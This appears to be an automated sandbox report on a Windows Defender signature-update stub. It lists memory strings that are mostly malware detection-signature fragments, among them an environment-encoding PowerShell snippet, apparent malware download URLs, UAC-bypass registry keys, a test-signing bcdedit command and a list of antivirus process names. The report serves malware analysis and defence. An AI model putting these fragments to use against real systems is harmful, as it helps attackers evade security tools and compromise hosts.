Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: getobject("winmgmts:"&"{impersonationlevel=impersonate}!\\"&"."&"\root\cimv2")
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: pgetobject("winmgmts:"&"{impersonationlevel=impersonate}!\\"&"."&"\root\cimv2")
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: .!#scpt:trojan:js/wmiactivescriptconsumer.a!ams
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: setpropvalue.consumer("\\.\root\subscription:activescripteventconsumer.name=
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: nsetpropvalue.consumer("\\.\root\subscription:activescripteventconsumer.name=
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 4!#alf:backdoor:script/vsbuildeventpowershellrundll.a
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: buildevent><command>powershell
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: hbuildevent><command>powershell
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: `</command></
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: buildevent>
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#scpt:godexb.d
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: tobase64string($asc.getbytes($env:computername+"."+$env:userdnsdomain+"/"+$env:username)).replace('=','%3d')
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ntobase64string($asc.getbytes($env:computername+"."+$env:userdnsdomain+"/"+$env:username)).replace('=','%3d')
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#scpt:alphalakeae
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: varl=
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: kvarl=
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: .length;r.write("12345678"+l+":");while(l>0){if(r.isclientconnected){varb:byte[]=newbyte[204800];
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#scpt:nemucod.gb1
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: kcatch(
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ){}}};try{
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: .send();}catch(
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ){}if(
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#slf:copyfilestartup
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ifilesystem3.copyfile("
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: hifilesystem3.copyfile("
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 0\appdata\roaming\microsoft\windows\startmenu\programs\sta
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ","true");
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#scpt:o97m/qakbot.yd2
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: http://thomastongrealestate.com/skywkc/3415201.pnga'http://thomastongrealestate.com/skywkc/dd(oaoabp%
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ghttp://thomastongrealestate.com/skywkc/3415201.pnga'http://thomastongrealestate.com/skywkc/dd(oaoabp%
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#script:js/msfdbrow.2
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: =string("\x65\x76\x61\x6c\x28\x25\x28\x59\x32\x39\x6b\x5a\x53\x41\x39\x49\x43\x55\x6f\x59\x32\x31\x57
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: g=string("\x65\x76\x61\x6c\x28\x25\x28\x59\x32\x39\x6b\x5a\x53\x41\x39\x49\x43\x55\x6f\x59\x32\x31\x57
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#script:uacbypassreg2
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: .regwrite
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: g.regwrite
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: classes\
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ms-settings\
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: shell\
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: open\
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: command\
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: delegateexecute
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#scpt:js/phish.yu1!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: jacobsonpointapt.xyz/vxj/awxhcmlhlmnvdmvydgfaaxrhbgdhcy5pda==
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: fjacobsonpointapt.xyz/vxj/awxhcmlhlmnvdmvydgfaaxrhbgdhcy5pda==
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: settimeout("location.href='https://
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#alfper:scpt:tedpyrc.a1
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: i=0;$i<strlen($x);$i++)$x[$i]=chr(ord($x[$i])^ord($k[$i%strlen($k)]));@fseek($fp,0);@fwrite($fp,$x)
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ei=0;$i<strlen($x);$i++)$x[$i]=chr(ord($x[$i])^ord($k[$i%strlen($k)]));@fseek($fp,0);@fwrite($fp,$x)
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#scpt:vbsxorconcathex.1
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: =eval(chrw(38
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: e=eval(chrw(38
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: .0)&chrw(72
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: .0)&(mid(
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ,(chrw(50
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: )-chrw(49
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30AE0C4 AllocateAndInitializeSid,FreeSid, 18_2_00007FF7E30AE0C4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30AF884 GetCurrentProcess,GetLengthSid,InitializeSecurityDescriptor,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,GetLastError,CloseHandle,SetLastError, 18_2_00007FF7E30AF884
Source: MpSigStub.exe, 0000000B.00000003.18320594233.0000021B5E399000.00000004.00000001.sdmp Binary or memory string: MSVBVM60MSVBVM50MSVBVM events are artifactsRICHEDIT50Wmyself.dll%08x0x%xException in the timer procC:\Wallpaper1.bmp2 :|:1 11EditButtonVDLL:HMValidateHandleCalledC:\C:\WinSta0SkypeControlAPISkypeControlAPIAttachSkypeControlAPIDiscoverGDI32.DLLArmadillo_MutexGDI32.DLLChildControlStaticListBoxScrollBarComboBox#32770DialogPEEMU:VirTool:Win32/Obfuscator_Upatreriched20.dllRichEditANSIWndProcRichEditMDICLIENTMDICLIENTlistboxWINSTA0WinSta0Winsta0Winsta000000409CursorInternet Explorer_ServerTibiaClientTibia#32769ATL:007BF380YTopWindowYahooBuddyMainYahoo! MessengerWMPlayerAppPlaying MP3NotepadMy saved passwords - NotepadProgram ManagerShell_TrayWndtooltips_class32CityBank log-inIEFrameBank of America log-infalsetrue_Dummy_0x6A__Dummy_0x69__Dummy_0x68__Dummy_0x67__Dummy_0x66__Dummy_0x65__Dummy_0x64__Dummy_0x63__Dummy_0x62__Dummy_0x61__Dummy_0x60__Dummy_0x5F__Dummy_0x5E__Dummy_0x5D__Dummy_0x5C__Dummy_0x5B__Dummy_0x5A__Dummy_0x59__Dummy_0x58__Dummy_0x57__Dummy_0x56__Dummy_0x55__Dummy_0x54__Dummy_0x53__Dummy_0x52__Dummy_0x51__Dummy_0x50__Dummy_0x4F__Dummy_0x4E__Dummy_0x4D__Dummy_0x4C__Dummy_0x4B__Dummy_0x4A__Dummy_0x49__Dummy_0x48__Dummy_0x47__Dummy_0x46__Dummy_0x45__Dummy_0x44__Dummy_0x43__Dummy_0x42__Dummy_0x41__Dummy_0x40__Dummy_0x3F__Dummy_0x3E__Dummy_0x3D__Dummy_0x3C__Dummy_0x3B__Dummy_0x3A__Dummy_0x39__Dummy_0x38__Dummy_0x37__Dummy_0x36__DummyAA__DummyZ__DummyW__DummyV__DummyU__DummyT__DummyS__DummyR__DummyQ__DummyP__DummyO__DummyN__DummyM__DummyL__DummyK__DummyJ__DummyI__DummyH__DummyG__DummyF__DummyE__DummyD__DummyC__DummyB__DummyA__Dummy9__Dummy_x1c__Dummy7__Dummy6__Dummy5__Dummy4__Dummy3__Dummy2__Dummy_
Source: MpSigStub.exe, 0000000B.00000003.18271295741.0000021B5FAF1000.00000004.00000001.sdmp Binary or memory string: C:\WINDOWS\SYSTEM32\progman.exeexe D
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp Binary or memory string: Program Manager
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: MpSigStub.exe, 0000000B.00000003.18266135814.0000021B5EBFB000.00000004.00000001.sdmp Binary or memory string: GetProgmanWindow
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp Binary or memory string: %s\Rundll32.exe "%s\%s",DllCanUnloadNowShell_TrayWndSoftware\
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndx
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp Binary or memory string: \Internet Explorer\Quick Launch\Shell_TrayWnd
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp Binary or memory string: Progman Folder*Administrative Tools
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: shell_traywnd%s\C:\WINDOWS\Sy
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: shell_traywnd
Source: MpSigStub.exe, 0000000B.00000003.18266135814.0000021B5EBFB000.00000004.00000001.sdmp Binary or memory string: SetProgmanWindow
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp Binary or memory string: shell_traywnd

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Queries volume information: C:\ VolumeInformation
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30A418C cpuid 18_2_00007FF7E30A418C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe Code function: 10_2_00007FF69C508ED4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 10_2_00007FF69C508ED4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E305F3E8 GetCurrentProcessId,GetCurrentProcessId,CreateNamedPipeW,GetCurrentProcessId, 18_2_00007FF7E305F3E8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30AD874 RtlGetVersion,RtlNtStatusToDosError,SetLastError,GetLastError, 18_2_00007FF7E30AD874

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
May enable test signing (to load unsigned drivers)
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Memory string: bcdedit.exe -set TESTSIGNING ON
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Memory string: bcdedit.exe -set TESTSIGNING ON
AV process strings found (often used to terminate AV products)
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: scanwscs.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: \avgupd.exe
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp Binary or memory string: Bsoftware\microsoft\windows\currentversion\app paths\wireshark.exe
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp Binary or memory string: procmon.exe
Source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: fsgk32.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: bullguard.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: fsm32.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: ravmond.exe
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp Binary or memory string: fsav32.exe
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp Binary or memory string: hijackthis.exe
Source: MpSigStub.exe, 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp Binary or memory string: \msmpeng.exe
Source: MpSigStub.exe, 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp Binary or memory string: \windows defender\msascui.exe
Source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp Binary or memory string: FSMA32.EXE
Source: MpSigStub.exe, 0000000B.00000003.18287502945.0000021B5FA2A000.00000004.00000001.sdmp Binary or memory string: [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp Binary or memory string: fsbl.exe
Source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp Binary or memory string: procdump.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: fpavserver.exe
Source: MpSigStub.exe, 0000000B.00000003.18275295752.0000021B5E8EE000.00000004.00000001.sdmp Binary or memory string: kxetray.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: \virus.exe
Source: MpSigStub.exe, 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: sbamtray.exe
Source: MpSigStub.exe, 0000000B.00000003.18275295752.0000021B5E8EE000.00000004.00000001.sdmp Binary or memory string: 360tray.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: avgnsx.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: torun.infshell\open\command=virus.exe[AutoRun]\virus.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: superantispyware.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: 360Tray.exe
Source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp Binary or memory string: mcvsshld.exe
Source: MpSigStub.exe, 0000000B.00000003.18287502945.0000021B5FA2A000.00000004.00000001.sdmp Binary or memory string: [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe
Source: MpSigStub.exe, 0000000B.00000003.18290670791.0000021B5EA2C000.00000004.00000001.sdmp Binary or memory string: \windows defender\msmpeng.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: op_mon.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: k7emlpxy.exe
Source: MpSigStub.exe, 0000000B.00000003.18287502945.0000021B5FA2A000.00000004.00000001.sdmp Binary or memory string: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: quhlpsvc.exe
Source: MpSigStub.exe, 0000000B.00000003.18275295752.0000021B5E8EE000.00000004.00000001.sdmp Binary or memory string: msmpeng.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: k7pssrvc.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: k7tsmngr.exe
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp Binary or memory string: *.csv.|!\SBAMSvc.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: emlproxy.exe
Source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp Binary or memory string: nod32.exe
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp Binary or memory string: kav.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: fprottray.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: clamtray.exe
Source: MpSigStub.exe, 0000000B.00000003.18271875612.0000021B5DFCB000.00000004.00000001.sdmp Binary or memory string: savservice.exe
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp Binary or memory string: nod32krn.exe
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp Binary or memory string: avgupd.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: guardxservice.exe
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp Binary or memory string: regshot.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: k7fwsrvc.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: \avp.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: \kav.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: avkservice.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: virusutilities.exe
Source: MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp Binary or memory string: lordpe.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: 0{645FF040-5081-101B-9F08-00AA002F954E}\kav32.exe
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.manifest.|!\SavService.exe
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: autoruns.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: k7rtscan.exe
Source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp Binary or memory string: mcagent.exe
Source: MpSigStub.exe, 0000000B.00000003.18266494773.0000021B5F47F000.00000004.00000001.sdmp Binary or memory string: msascui.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: avkproxy.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: AyAgent.aye
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: AVGcsrvx.exe
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp Binary or memory string: RC:\Program Files\Wireshark\wireshark.exe
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp Binary or memory string: bdss.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: sbamsvc.exe
Source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp Binary or memory string: Vsserv.exe
Source: MpSigStub.exe, 0000000B.00000003.18283976563.0000021B5F1A8000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: clamwin.exe
Source: MpSigStub.exe, 0000000B.00000003.18287502945.0000021B5FA2A000.00000004.00000001.sdmp Binary or memory string: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: fsma32.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: acs.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: MSASCui.exe
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp Binary or memory string: avp.exe
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp Binary or memory string: Wireshark.exe
Source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp Binary or memory string: 360Safe.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: c:\123.exe
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp Binary or memory string: *.jpg.|!\SavService.exe
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp Binary or memory string: \vipre business agent\sbamsvc.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: mbam.exe
Source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp Binary or memory string: FSMB32.EXE
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp Binary or memory string: (\avp.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
Source: MpSigStub.exe, 0000000B.00000003.18287769484.0000021B5FA6C000.00000004.00000001.sdmp Binary or memory string: Image File Execution Options\msmpeng.exeDebuggerImage File Execution Options\msascui.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: avktray.exe
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp Binary or memory string: Regshot.exe
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp Binary or memory string: mcshield.exe
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp Binary or memory string: avgui.exe
Source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp Binary or memory string: C:\WINDOWS\123.EXE
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: \App Paths\360Safe.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: AVGcmgr.exe
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp Binary or memory string: fsav.exe
Source: MpSigStub.exe, 0000000B.00000003.18312990479.0000021B5F514000.00000004.00000001.sdmp Binary or memory string: delc:\programme\"windowsdefender"\msmpeng.exe
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp, mpam-728dfe11.exe Binary or memory string: MsMpEng.exe
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp Binary or memory string: "\vipre business agent\sbamsvc.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: onlinent.exe
